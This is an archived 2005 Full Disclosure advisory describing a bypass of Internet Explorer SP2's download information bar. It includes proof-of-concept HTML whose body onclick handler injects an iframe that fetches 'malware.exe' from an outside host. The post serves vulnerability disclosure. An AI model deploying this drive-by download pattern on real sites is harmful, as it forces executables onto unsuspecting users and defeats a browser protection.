Full Disclosure mailing list archives
Internet Explorer (SP2) - Remote File Download Information Bar Bypass
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Fri, 14 Jan 2005 09:53:00 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: Internet Explorer Vendors: http://www.microsoft.com Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158 Patched With: SP2; Platforms: Windows Bug: Remote File Download Information Bar Bypass Exploitation: Remote with browser Date: 13 Jan 2005 Author: Rafel Ivgi, The-Insider e-mail: the_insider () mail com web: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== Internet Explorer is currently the most common internet browser in the world. Microsoft Windows XP Service Pack 2 was designed to block any file download by an information bar which must be clicked and selected with "Download File". ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== While trying to download a file Microsoft Internet Explorer the user gets the information bar. The information bar mechanism blocks/catches all references to download-able files, even through javascripts and HTML Event properties. However Microsoft's Internet Explorer (SP2) DOES NOT CATCH "body" tag with the HTML "onclick" event which dynamically created "iframe" tags. For a good, more complicated dynamic object creation i used the "createElement" function. This way an attacker can make a user download a file with him just clicking anywhere on the page (not on an hyperlink). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== Paste into an htm/html file and add "<" at the begining of each line: ------------------------ cut here -------------------------------------- !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> !-- saved from url=(0031)http://theinsider.deep-ice.com/ --> HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE> META http-equiv=expires content="01 Jan 1998 01:01:00 GMT"> META http-equiv=Content-Type content="text/html; charset=windows-1252"> META http-equiv=Content-Language content=en-us> META content=True name=HandheldFriendly> META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD> embed> body onclick='a=document.createElement("\<iframe src=\"http:\/\/theinsider.deep- ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild (a);setTimeout("document.execCommand\(\"refresh\")",1000)'> cebter><br><br><br><br><br><br>Click AnyWhere You Want</center> /BODY></HTML> ------------------------ cut here -------------------------------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Scripts and Codes will make me D.O.S , but they will never HACK me." _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Internet Explorer (SP2) - Remote File Download Information Bar Bypass Rafel Ivgi, The-Insider (Jan 14)